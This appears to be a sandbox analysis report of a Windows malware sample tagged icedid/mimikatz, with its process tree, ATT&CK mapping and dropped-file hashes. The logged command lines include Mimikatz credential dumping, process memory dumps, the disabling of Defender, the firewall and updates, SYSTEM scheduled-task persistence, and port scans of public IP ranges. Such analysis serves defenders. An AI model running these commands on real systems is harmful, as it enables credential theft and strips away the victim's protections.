PID 1484 wrote to memory of 1616 1484 cmd.exe 96 (×3)
PID 1484 wrote to memory of 2688 1484 cmd.exe 97 (×3)
PID 2696 wrote to memory of 4928 2696 zyejeil.exe 98 (×3)
PID 2696 wrote to memory of 1036 2696 zyejeil.exe 100 (×3)
PID 2696 wrote to memory of 3720 2696 zyejeil.exe 102 (×3)
PID 2696 wrote to memory of 1988 2696 zyejeil.exe 115 (×3)
PID 1988 wrote to memory of 4856 1988 cmd.exe 117 (×3)
PID 4856 wrote to memory of 2316 4856 wpcap.exe 118 (×3)
PID 2316 wrote to memory of 1756 2316 net.exe 120 (×3)
PID 4856 wrote to memory of 4912 4856 wpcap.exe 121 (×3)
PID 4912 wrote to memory of 1468 4912 net.exe 123 (×3)
PID 4856 wrote to memory of 4280 4856 wpcap.exe 124 (×3)
PID 4280 wrote to memory of 4368 4280 net.exe 126 (×3)
PID 4856 wrote to memory of 208 4856 wpcap.exe 127 (×1; the list ends at 64 entries)
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2044
-
C:\Windows\TEMP\stjqapuut\ejzklm.exe"C:\Windows\TEMP\stjqapuut\ejzklm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uzepkltb\zyejeil.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:492
-
-
C:\Windows\uzepkltb\zyejeil.exeC:\Windows\uzepkltb\zyejeil.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4880
-
-
-
C:\Windows\uzepkltb\zyejeil.exeC:\Windows\uzepkltb\zyejeil.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4928
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1036
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3720
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exeC:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1756
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4368
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:208 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:952
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:436 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3848
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt2⤵PID:1788
-
C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exeC:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lrcwzntnt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\lrcwzntnt\Corporate\vfshost.exeC:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"2⤵PID:3632
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"2⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5060
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:688
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1108
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1348
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4908
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4528
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:2260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:3532
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:1616 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5000
-
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 792 C:\Windows\TEMP\lrcwzntnt\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:4872 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:4760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:928
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:3256 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:4004 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:1476
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:2416 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:1564
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2512 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:4896 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4588
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3248
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:964
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 380 C:\Windows\TEMP\lrcwzntnt\380.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2044 C:\Windows\TEMP\lrcwzntnt\2044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2640 C:\Windows\TEMP\lrcwzntnt\2640.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2848 C:\Windows\TEMP\lrcwzntnt\2848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2856 C:\Windows\TEMP\lrcwzntnt\2856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3128 C:\Windows\TEMP\lrcwzntnt\3128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3832 C:\Windows\TEMP\lrcwzntnt\3832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3928 C:\Windows\TEMP\lrcwzntnt\3928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3992 C:\Windows\TEMP\lrcwzntnt\3992.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4080 C:\Windows\TEMP\lrcwzntnt\4080.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4108 C:\Windows\TEMP\lrcwzntnt\4108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4104 C:\Windows\TEMP\lrcwzntnt\4104.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4548 C:\Windows\TEMP\lrcwzntnt\4548.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3744 C:\Windows\TEMP\lrcwzntnt\3744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2012 C:\Windows\TEMP\lrcwzntnt\2012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exeC:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 180 C:\Windows\TEMP\lrcwzntnt\180.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\lrcwzntnt\bmkbibntg\scan.bat2⤵PID:3424
-
C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exenusubcedp.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:5200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4128
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2968
-
-
        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            PID: 5968
        [3] C:\Windows\SysWOW64\cacls.exe
            Command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            - System Location Discovery: System Language Discovery
            PID: 3180
[1] C:\Windows\SysWOW64\joxnkm.exe
    Command line: C:\Windows\SysWOW64\joxnkm.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID: 904
[1] C:\Windows\system32\cmd.EXE
    Command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
    PID: 2688
    [2] C:\Windows\ime\zyejeil.exe
        Command line: C:\Windows\ime\zyejeil.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        PID: 2372
[1] C:\Windows\system32\cmd.EXE
    Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
    PID: 412
    [2] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        PID: 2424
    [2] C:\Windows\system32\cacls.exe
        Command line: cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
        PID: 1752
[1] C:\Windows\system32\cmd.EXE
    Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
    PID: 4512
    [2] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        PID: 1064
    [2] C:\Windows\system32\cacls.exe
        Command line: cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
        PID: 3660
[1] C:\Windows\system32\cmd.EXE
    Command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
    PID: 5252
    [2] C:\Windows\ime\zyejeil.exe
        Command line: C:\Windows\ime\zyejeil.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        PID: 4796
[1] C:\Windows\system32\cmd.EXE
    Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
    PID: 1680
    [2] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        PID: 5140
    [2] C:\Windows\system32\cacls.exe
        Command line: cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
        PID: 5060
[1] C:\Windows\system32\cmd.EXE
    Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
    PID: 1604
    [2] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        PID: 816
    [2] C:\Windows\system32\cacls.exe
        Command line: cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
        PID: 5640
Network
MITRE ATT&CK Enterprise v15
Execution
    Scheduled Task/Job (1)
        Scheduled Task (1)
    System Services (1)
        Service Execution (1)
Persistence
    Create or Modify System Process (2)
        Windows Service (2)
    Event Triggered Execution (2)
        Image File Execution Options Injection (1)
        Netsh Helper DLL (1)
    Scheduled Task/Job (1)
        Scheduled Task (1)
Privilege Escalation
    Create or Modify System Process (2)
        Windows Service (2)
    Event Triggered Execution (2)
        Image File Execution Options Injection (1)
        Netsh Helper DLL (1)
    Scheduled Task/Job (1)
        Scheduled Task (1)
Discovery
    Network Service Discovery (2)
    Network Share Discovery (1)
    Query Registry (1)
    Remote System Discovery (1)
    System Information Discovery (1)
    System Location Discovery (1)
        System Language Discovery (1)
    System Network Configuration Discovery (1)
        Internet Connection Discovery (1)
Downloads
- Filesize: 95KB
  MD5: 86316be34481c1ed5b792169312673fd
  SHA1: 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
  SHA256: 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
  SHA512: 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
- Filesize: 275KB
  MD5: 4633b298d57014627831ccac89a2c50b
  SHA1: e5f449766722c5c25fa02b065d22a854b6a32a5b
  SHA256: b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
  SHA512: 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
- Filesize: 4.2MB
  MD5: 034c9a2213e44cf57ed2cd6d69d40d75
  SHA1: 00ff509ea6b20d4cc17d9550761b426045daa200
  SHA256: cda2eaede2d642d5dd0bcd76cdc6e61c9387a7ed2d66be97fa2475408f856b16
  SHA512: 3eb229473cba46104291d39345da2fede1f1e3d85871ba6331233801ae4591a66f0802b4c37119c5da13f6d816715110bdc9114912fc07e5d169d26e3827e9e3
- Filesize: 3.8MB
  MD5: 49782ed84678a8564f6e3d11a2ddc72e
  SHA1: 2761ca2574db66b7b37d27ced97e4919b73ab132
  SHA256: d62019ceecd07ca8d1f2737153f53d13b043aadd121813b91685d925b49e647b
  SHA512: b11e1e02bcf072199f0fa29923eff183d30c402996069fa87de6720d912d66da5452c93b7fbb49988196f2451264acae95a78f5415650b63827e929f95edf37d
- Filesize: 3.0MB
  MD5: 35cbae125f409a741ece7163da210da4
  SHA1: 8d595fd0c32df30e195b284b1945c986fff337d8
  SHA256: 5eb422351436a274eb1883e0cc749059dac3fe08f6e56a261b7f562db0fa736d
  SHA512: 70c8e74bec4e4d43eaf5419fe19faddc341959cf1600521e7bd7e53f7d98ba2cd3b10ebcbf2537108e4ec9330f3a1811d09c70bffec7f52bd319afd1f91970ca
- Filesize: 7.6MB
  MD5: c616a3c09ab1337fdba411ef067c3314
  SHA1: 9ac109f6f122292e71ed09137bddb3712bc3778d
  SHA256: 7ba68f578cd83db1615ed91b8f70f139b70cf4f7120624e3d2062dbf7e25f608
  SHA512: d0ae6f43f8c9899f6b46666ca5748a961caab4aaf17ef7b0e9bddda4bafdf1d3358fdcd6af51b44197459e7327bb702cb34ce394e099f5b5bb27f6246ff844b5
- Filesize: 818KB
  MD5: e742ef348c1f1377b82f5c8358ed3e79
  SHA1: e8a3ac6ddfe188405974e3d5ed2f3df5154bbc5b
  SHA256: 1392f768a6780822ea4708f33215d38baae276ddd0b14bc370fdc2bd49ac9ed1
  SHA512: 0fab929759c605efca8a44f792cd795f1a53d20539bc90f2a6024489ac7e0e2c06fa942ef917a97b5fa6c1142d51dfe406a3c92cb1e7312fca8b6ab428ca0505
- Filesize: 2.7MB
